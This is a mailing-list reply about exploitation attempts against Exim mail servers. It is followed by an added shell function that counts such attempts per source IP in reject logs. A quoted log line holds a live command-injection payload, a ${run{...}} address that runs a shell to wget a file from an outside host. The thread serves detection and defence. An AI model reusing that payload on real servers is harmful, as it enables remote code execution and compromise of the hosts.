Re: Exim latest update reports to world as 4.89, which the world thinks is vulnerable.
On 21/6/19 5:52 am, Reco wrote:
> Plain old grep is more than enough here. This one:
>
> grep 'run{' /var/log/exim4/reject*
>
> finds things like these:
>
> 2019-06-19 18:54:43 H=(service.com) [107.182.225.42]
> F=<support@service.com> rejected RCPT
> <root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2064.50.180.45\x2ftmp\x2fxxx.xxx.xxx.xxx\x22}}@localhost>:
> Unrouteable address
Okay:
21 attempts from 8 different IP addresses on one server
28 attempts on another server
17 attempts on another server
1 [188.138.0.205]
2 [89.248.171.57]
3 [98.158.184.125]
13 unique IP addresses so far.... (dig -x output)
Cheers
A.
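Added example, not part of the original messages: the per-address tally reported above, written as a shell function that extends the quoted grep. The function names, sample lines and addresses are constructed for illustration, and the field layout assumed is Exim's default reject-log line as shown in the quoted excerpt.

```shell
#!/bin/sh
# Added example (not from the thread): count Exim reject-log lines that carry
# a ${run{...}} expansion in the address, grouped by connecting IP.

# Print "<attempts> <ip>" per source, busiest first. Reads log text on stdin.
run_attempts_by_ip() {
    awk '
    index($0, "${run{") {
        # Fields 1-2 are date and time. The connecting address is the first
        # field that is entirely "[addr]" (optionally "H=[addr]" or
        # "[addr]:port"). A HELO literal is logged as "([addr])", so it
        # starts with "(" and is skipped: the client chooses that value.
        for (i = 3; i <= NF; i++) {
            f = $i
            sub(/^H=/, "", f)
            if (f ~ /^\[[0-9A-Fa-f.:]+\](:[0-9]+)?$/) {
                sub(/^\[/, "", f)
                sub(/\].*$/, "", f)
                hits[f]++
                break
            }
        }
    }
    END { for (ip in hits) print hits[ip], ip }
    ' | sort -k1,1nr -k2,2
}

# Constructed sample lines: documentation-range addresses, harmless payload.
sample_log() {
cat <<'EOF'
2019-06-19 18:54:43 H=(a.example) [192.0.2.10] F=<x@a.example> rejected RCPT <root+${run{\x2Fbin\x2Ftrue}}@localhost>: Unrouteable address
2019-06-19 18:54:50 H=(a.example) [192.0.2.10] F=<x@a.example> rejected RCPT <root+${run{\x2Fbin\x2Ftrue}}@localhost>: Unrouteable address
2019-06-19 18:55:01 H=([192.0.2.10]) [198.51.100.7] F=<x@b.example> rejected RCPT <root+${run{\x2Fbin\x2Ftrue}}@localhost>: Unrouteable address
2019-06-19 18:55:09 H=(c.example) [203.0.113.5] F=<y@c.example> rejected RCPT <nobody@relay.example>: Unrouteable address
2019-06-19 18:56:12 H=host.a.example (a.example) [192.0.2.10] F=<x@a.example> rejected RCPT <root+${run{\x2Fbin\x2Ftrue}}@localhost>: Unrouteable address
EOF
}

# Demonstration on the sample: prints "3 192.0.2.10" then "1 198.51.100.7".
sample_log | run_attempts_by_ip
```

On a live host, feed it the files the thread greps: `cat /var/log/exim4/reject* | run_attempts_by_ip`.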